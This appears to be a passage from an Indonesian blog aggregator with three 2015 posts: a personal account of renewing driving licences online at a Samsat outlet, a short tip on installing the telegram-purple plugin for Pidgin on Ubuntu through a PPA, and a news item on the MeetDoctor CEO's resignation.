MDD: Isi form ini terus nanti kasih ke situ ya (nunjuk meja administrasi).

Setelah selesai isi form saya ke meja administrasi. Mbak di situ minta fotokopi KTP dan SIM. Karena saya belum punya, saya ke meja MDD tadi, fotokopi disitu. Bayar 3 ribu perak. Terus balik lagi ke meja administrasi.

Berkas saya diterima, lalu dikasih nomor antrian. Dapat nomor antrian 38, dan yang dipanggil terakhir baru sampai 14. Mayan nih nunggunya.

[Nomor antrian]
Saya menunggu sekitar sejam sampai nomor antrian saya dipanggil. Sebenarnya selama mengantri kalau lapar bisa mampir ke kantin karyawan sih. Letaknya persis seberangan sama gerai Samsatnya.

[Kantin karyawan di seberang Gerai Samsat]
Setelah nomor antrian dipanggil, saya masuk ke dalam, langsung ke tempat foto. Scan sidik jari kanan (4 jari, 2 jari dan jempol).

Nah saya lupa bakal ada sesi foto ini. Saya cuma pakai kaos dan jaket hoodie. Jadilah foto saya seadanya. Akibatnya kegantengan saya berkurang 30% di foto SIM.

Kelar foto, saya tandatangan digital di sebuah alat yang sudah disediakan.

Karena saya perpanjang 2 SIM, jadinya dua kali foto, dua kali scan sidik jari dan dua kali tandatangan.

Lalu terdengar suara “cekittt..creekittt..” printer sedang nyetak kartu SIM. Mas-mas yang tadi memfoto saya menyerahkan kedua SIM ke saya sambil bilang “Bayarnya di sini langsung, Mas. 2 SIM jadi 300ribu rupiah.” Saya pernah googling memang katanya perpanjang SIM segitu sih biaya resminya.

Tertahan

Dan kejadian berikutnya bikin saya tegang lagi, kali ini seperti saat eliminasi AFI di Indosiar (eh, masih inget gak acara ini?).

P: Pak Polisi di depan meja foto, namanya Paulus. Lihat dari pangkatnya sepertinya Brigpol. S: Saya. MYFS: Mas yang foto saya.

P: Itu yang SIM Jambi ya?
MYFS: Iya, Pak.
P: Nanti dulu ya. Saya pegang dulu.
MYFS: (SIM ditarik lagi dari saya, diserahkan ke P)
S: (pucet, tapi tetep ganteng)
P: (berdiri) Sini, Mas. Geser dikit.
S: (ya nurut, mau apa lagi. Lalu saya berdiri, geser dikit).
P: Oke.. Mbak! (manggil mbak admin, lalu menyerahkan ponselnya). Nahh.. foto dulu kita, Mas. Ini jauh-jauh dari Jambi loh.. Hehe. Jadi udah sah ini kita bisa perpanjang SIM Online kan. Hehe.
S: (Oalaahh.. dokumentasi toh. Pucet ilang. Kembali ganteng. Saya senyum lebar. Siapa tahu foto ini jadi poster di kantor pusat Dirlantas POLRI.)

Setelah salaman dan cium pipi kiri kanan, saya balik ke kantor saya, kerja lagi. Saya puas. Kerja aparatnya bagus dan mulus, di luar dugaan. Good job Pak Polisi.

Kesimpulan

Poin yang paling penting di sini, perpanjangan SIM memang nyata sudah bisa online, jadi mereka yang seperti saya (SIM nya dari luar propinsi tersebut), bisa perpanjang di kantor/gerai Samsat mana saja. Sudah lama saya pengen bisa kaya gini. Hemat waktu dan biaya. Syukurlah, akhirnya jadi kenyataan juga. Harapan saya, berikutnya KTP kita bisa dipakai untuk membeli kendaraan bermotor di propinsi yang berbeda dengan propinsi penerbit KTP. Toh sudah e-KTP kan.

Eh iya, waktu SIM diserahkan, disertai 2 kartu asuransi dari PT. Asuransi Bhakti Bhayangkara. Saya gak tahu sih ini buat apaan. Gak nanya-nanya juga. Saya simpen aja.

Sampai jumpa 5 tahun lagi. Mudah-mudahan saat itu pulpen nya sudah ada ya. 😛

on 13 Oct 2015 10:22 AM

12 Oct 2015

Telegram chat via PidGin

Fakhrul Rijal

sekedar info aja, baru nemu di WebUpd8 tentang akses Telegram melalui pidgin.
yang bisa dipasang langsung di Ubuntu/Mint menggunakan PPA:
sudo add-apt-repository ppa:nilarimogard/webupd8
sudo apt update
sudo apt install telegram-purple

lalu jalankan pidgin, dan pilih protocol Telegram:
Selesai.
on 12 Oct 2015 08:25 AM

08 Oct 2015

Di tengah munculnya Konsula –startup baru yang bisa jadi pesaing MeetDoctor, justru terdengar kabar mengejutkan dari MeetDoctor. CEO nya, Adhiatma Gunawan, mengundurkan diri, per 1 Oktober 2015 ini.

Adhiatma (yang juga seorang dokter) mengatakan alasannya keluar adalah karena MeetDoctor sudah tumbuh semakin besar dan kuat dan menjadi pemain penting di pasar. Menurut Adhiatma, ini adalah saatnya bagi penerusnya kelak, untuk membawa MeetDoctor ke pencapaian yang lebih tinggi.

Ya.., kalau menurut saya pribadi sih mungkin ada alasan lain. Kan sayang keluar dari startup yang sudah semakin besar. Tapi, entahlah ya. Siapa tahu kapan-kapan saya bikin tulisan lain yang menuliskan gebrakan Adhiatma berikutnya di dunia digital. 😀 Saya yakin perjalanan Adhiatma berikutnya pasti gak jauh-jauh dari membangun bisnis digital baru. Mari kita lihat nanti.

Tentang MeetDoctor.com

MeetDoctor.com adalah layanan konsultasi kesehatan gratis dengan dokter. Di sini pengguna layanan bisa berkonsultasi soal kesehatan secara umum dan akan dijawab langsung oleh dokter.

Saya pernah coba beberapa kali. Pertama kali mengirimkan pertanyaan, cukup memuaskan, tidak sampai 5 menit sudah mendapatkan respon. Tetapi tidak demikian untuk pertanyaan susulan. Ada yang dijawab beberapa hari kemudian, ada yang tidak pernah dijawab lagi.

Meetdoctor sendiri sudah mendapatkan investasi sekitar Rp 3,2 Miliar dari SMS CO.,LTD pada April 2013. Saat itu SMS berinvestasi bersama Corfina Capital (perusahaan investasi lokal). Dari hasil investasi ini, SMS memiliki 50% saham.

SMS (Senior Marketing System) adalah sebuah perusahaan dari Jepang yang bergerang di bidang manajemen dan teknologi di dunia healthcare dan nursing care.

Di July 2013, Meetdoctor sudah menjadi PT sendiri, dan kepemilikan SMS berubah menjadi 60.8%.

on 08 Oct 2015 09:14 AM